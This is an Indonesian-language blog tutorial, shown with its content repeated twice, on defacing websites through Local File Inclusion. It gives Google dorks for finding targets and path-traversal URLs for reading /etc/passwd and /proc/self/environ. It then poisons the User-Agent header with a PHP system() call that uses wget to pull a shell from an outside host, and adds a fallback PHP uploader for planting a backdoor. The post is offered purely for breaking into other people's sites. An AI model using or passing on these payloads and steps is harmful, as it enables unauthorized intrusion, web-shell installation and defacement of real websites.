Deface Metode Local File Inclusion
Assalamualaikum wr wb
Cara Meretas Website Dengan Teknik Local File Inclusion(LFI)
________________________________
Teknik Ini Cukup Sederhana Dan Basicnya mirip Seperti Sql Injection,Sebenarnya Teknik Ini Sudah Cukup lama.tapi baru ane Post Hari Ini Soalnya Susah Nyari Tergetny(mungkin ane yg kurang pro nge dorking;v) Konsepnya adalah meracuni Http headernya dengan uploader kalian lalu kalian bisa upload shell backdor
ciri ciri web yg vuln dengan metode ini yaitu ada ekstensi php setelah Sama dengan(=)
contoh http://nekopoi.care/file=kimak.php
nah begitu kira kira ciri ciri vulnnya slur:v
=================================
Alat Dan Bahan:v
-Shell Backdor
-Tamper Data(Bisa pake Mozilla atau Anon Hackbar)
-Script Uploadernya:D
-Kesabaran:v
==================================
Google Dork: inurl:/view/lang/index.php?page=?page=
inurl:/shared/help.php?page=
inurl:index.php?file= site:com"
(Kembangin lagi Dorknya;v)
==================================
Script Uploadernya:
<?system (' wget http://shellkalian.com/shell.txt -O shell.php');?>
==================================
Proof Of Concept:
1.Dorking Di Google Dan Pilih Web yg vuln
ingat Contoh web vuln LFI selalu ada ekstensi Php di belakanganya:v
2.Tambahkan ../../../ Di belakang Url
contoh https://site.com/?file=../../../
lalu enter jika blank mungkin saja vuln saya juga kurang tau hehe
3.sekarang kita iseng iseng ganti dengan /etc/passwd
contoh https://site.com/?file=/etc/passwd
tapi masih kosong belum muncul apapun sekarang kita coba naikan direktorinya seperti ini
https://site.com/?file=../etc/passwd > Kosong
https://site.com/?file=../../etc/passwd > kosong
https://site.com/?file=../../../etc/passwd > kosong
https://site.com/?file=../../../../etc/passwd > kosong
https://site.com/?file=../../../../../etc/passwd > nemu
catatan:kalau masih error, naikkan terus direktori nya sampai file /etc/passwd nya ketemu.
4.nah saya nemu bugnya di direktori seperti ini https://site.com/?file=../../../../../etc/passwd
sekarang ke proc/self/environ kira kira bisa di akses tidak karena di sini kita akan mulai main backdor
ganti /etc/passwd dengan /proc/slelf/environ
https://site.com/?file=../../../../../proc/self/environ
nah kalo engga blank/kosong berarti bisa hehe
5.Selanjutnya Racuni Http Headernya Dengan malicious code
aktifkan tamper data.
load halaman https://site.com/?file=../../../../../proc/self/environ
Lalu tamper.
pada user-agent di isi dengan
<?system(‘wget http://shellkalian.com/shell.txt -O shell.php’);?>
Lalu submit jika berhasil shell kalian terletak di
http://site.com/shell.php
catatan:di beberapa kasus fungsi system di server dimatikan sehingga kita tidak bisa melakukan wget seperti cara di atas
jika itu terjadi coba cara berikut
pada user-agent masukkan script uploader ini :
<?php @copy($_FILES['file']['tmp_name'],$_FILES['file']['name']); ?><p> <h1> shu </h1></p> <br> <form action="" method="post" enctype="multipart/form-data"> Filename: <input type="file" name="file" /><input type="submit" value="Submit" /><br>
Setelah diupload, maka shell akan terletak di root path domain.
oke sekian semoga bermanfaat
wassalamualaikum wr wb
Cara Meretas Website Dengan Teknik Local File Inclusion(LFI)
________________________________
Teknik Ini Cukup Sederhana Dan Basicnya mirip Seperti Sql Injection,Sebenarnya Teknik Ini Sudah Cukup lama.tapi baru ane Post Hari Ini Soalnya Susah Nyari Tergetny(mungkin ane yg kurang pro nge dorking;v) Konsepnya adalah meracuni Http headernya dengan uploader kalian lalu kalian bisa upload shell backdor
ciri ciri web yg vuln dengan metode ini yaitu ada ekstensi php setelah Sama dengan(=)
contoh http://nekopoi.care/file=kimak.php
nah begitu kira kira ciri ciri vulnnya slur:v
=================================
Alat Dan Bahan:v
-Shell Backdor
-Tamper Data(Bisa pake Mozilla atau Anon Hackbar)
-Script Uploadernya:D
-Kesabaran:v
==================================
Google Dork: inurl:/view/lang/index.php?page=?page=
inurl:/shared/help.php?page=
inurl:index.php?file= site:com"
(Kembangin lagi Dorknya;v)
==================================
Script Uploadernya:
<?system (' wget http://shellkalian.com/shell.txt -O shell.php');?>
==================================
Proof Of Concept:
1.Dorking Di Google Dan Pilih Web yg vuln
ingat Contoh web vuln LFI selalu ada ekstensi Php di belakanganya:v
2.Tambahkan ../../../ Di belakang Url
contoh https://site.com/?file=../../../
lalu enter jika blank mungkin saja vuln saya juga kurang tau hehe
3.sekarang kita iseng iseng ganti dengan /etc/passwd
contoh https://site.com/?file=/etc/passwd
tapi masih kosong belum muncul apapun sekarang kita coba naikan direktorinya seperti ini
https://site.com/?file=../etc/passwd > Kosong
https://site.com/?file=../../etc/passwd > kosong
https://site.com/?file=../../../etc/passwd > kosong
https://site.com/?file=../../../../etc/passwd > kosong
https://site.com/?file=../../../../../etc/passwd > nemu
catatan:kalau masih error, naikkan terus direktori nya sampai file /etc/passwd nya ketemu.
4.nah saya nemu bugnya di direktori seperti ini https://site.com/?file=../../../../../etc/passwd
sekarang ke proc/self/environ kira kira bisa di akses tidak karena di sini kita akan mulai main backdor
ganti /etc/passwd dengan /proc/slelf/environ
https://site.com/?file=../../../../../proc/self/environ
nah kalo engga blank/kosong berarti bisa hehe
5.Selanjutnya Racuni Http Headernya Dengan malicious code
load halaman https://site.com/?file=../../../../../proc/self/environ
Lalu tamper.
pada user-agent di isi dengan
<?system(‘wget http://shellkalian.com/shell.txt -O shell.php’);?>
Lalu submit jika berhasil shell kalian terletak di
http://site.com/shell.php
catatan:di beberapa kasus fungsi system di server dimatikan sehingga kita tidak bisa melakukan wget seperti cara di atas
jika itu terjadi coba cara berikut
pada user-agent masukkan script uploader ini :
<?php @copy($_FILES['file']['tmp_name'],$_FILES['file']['name']); ?><p> <h1> shu </h1></p> <br> <form action="" method="post" enctype="multipart/form-data"> Filename: <input type="file" name="file" /><input type="submit" value="Submit" /><br>
Setelah diupload, maka shell akan terletak di root path domain.
oke sekian semoga bermanfaat
wassalamualaikum wr wb
Belum ada Komentar untuk "Deface Metode Local File Inclusion"
Posting Komentar